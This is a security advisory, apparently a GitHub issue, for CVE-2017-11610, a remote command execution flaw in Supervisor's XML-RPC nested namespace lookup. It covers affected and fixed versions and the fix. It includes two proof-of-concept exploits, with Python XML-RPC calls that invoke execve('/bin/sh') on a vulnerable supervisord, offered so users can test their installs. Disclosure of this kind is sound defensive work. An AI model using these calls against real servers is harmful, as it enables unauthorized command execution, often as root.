CVE-2017-11610

Overview

supervisord can be configured to run an HTTP server on a TCP socket and/or a Unix domain socket. The HTTP server is how supervisorctl communicates with supervisord. If an HTTP server has been enabled, it will always serve both HTML pages and an XML-RPC interface. A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root.

This vulnerability can only be exploited by an authenticated client or if supervisord has been configured to run an HTTP server without authentication. If authentication has not been enabled, supervisord will log a message at the critical level every time it starts, similar to:

2017-07-22 19:02:09,719 CRIT Server 'inet_http_server' running without any HTTP authentication checking
2017-07-22 19:02:09,720 CRIT Server 'unix_http_server' running without any HTTP authentication checking

Affected Versions

This vulnerability has existed in all versions of Supervisor since 3.0a1 (released in 2007).

Fixed Versions

The latest release of Supervisor, version 3.3.3, fixes this vulnerability. The fix has also been backported to previous versions. The following fixed versions have been released:

Supervisor 3.3.3 (package, tag, commit)
Supervisor 3.2.4 (package, tag, commit)
Superivsor 3.1.4 (package, tag, commit)
Supervisor 3.0.1 (package, tag, commit)

The only change from the previous point releases is the fix for this vulnerability. All users are advised to upgrade.

Details

supervisord has a plugin mechanism where an object can be registered to be exposed over XML-RPC. An object is registered using an rpcinterface: section in the config file. Each object is assigned to an XML-RPC namespace. supervisord itself provides two built-in namespaces, supervisor and system. The supervisor namespace provides methods used by supervisorctl. The system namespace provides methods common to most XML-RPC servers.

An XML-RPC method name takes the form supervisor.getState where the first part (supervisor) is the namespace and the second part (getState) is the method. When an XML-RPC request is received, supervisord looks up the namespace in the objects registered to handle XML-RPC, then calls a method on the object with the parameters sent by the remote.

The XML-RPC namespace lookup in supervisord is recursive. It allows for nested namespaces like a.b.c.methodName. It will start with the object registered to serve the a namespace, and if that object had a b attribute, it will traverse into b, then into c, and finally call methodName on c. There is a security check built in to this traversal: if an object's attribute started with _, the XML-RPC code will not traverse into it.

The vulnerability is that the object registered to serve the supervisor namespace has an attribute supervisord, which should have been prefixed with _ but is not. The supervisord object contains the core functionality of the daemon, and has many methods and objects that were never intended to be exposed to remote clients. The XML-RPC code will traverse into it and allow the remote client access to anything not prefixed with _.

The vulnerability has been fixed by disabling nested namespace lookup entirely. supervisord will now only call methods on the object registered to handle XML-RPC requests and not any child objects it may contain. While this is technically a breaking change, no publicly available plugins are currently known that use nested namespaces. Plugins that use a single namespace will continue to work as before.

The exploits below have been provided so users can test if the version of supervisord they are using is vulnerable.

Exploit 1 (TCP Socket)

Create a config file supervisord.conf:

[supervisord]
loglevel = trace

[inet_http_server]
port = 127.0.0.1:9001

[rpcinterface:supervisor]
supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface

Start supervisord in the foreground with that config file:

$ supervisord -n -c supervisord.conf

In a new terminal:

$ python2
>>> from xmlrpclib import ServerProxy
>>> server = ServerProxy('http://127.0.0.1:9001/RPC2')
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})

If the supervisord version is vulnerable, the execve will be executed and the supervisord process will be replaced with /bin/sh (or any other command given). If the supervisord version is not vulnerable, it will return an UNKNOWN_METHOD fault.

Exploit 2 (Unix Domain Socket)

Create a config file supervisord.conf:

[supervisord]
loglevel = trace

[unix_http_server]
file = /tmp/supervisord.sock

[rpcinterface:supervisor]
supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface

Start supervisord in the foreground with that config file:

$ supervisord -n -c supervisord.conf

In a new terminal:

$ python2
>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2',
... SupervisorTransport('', '', 'unix:///tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})

Acknowledgement

This vulnerability was reported by Maor Shwartz, who requested this acknowledgement:

"An independent security researcher, Calum Hutton, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program."

[CVE-2017-11610] RCE vulnerability report #964

Description

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions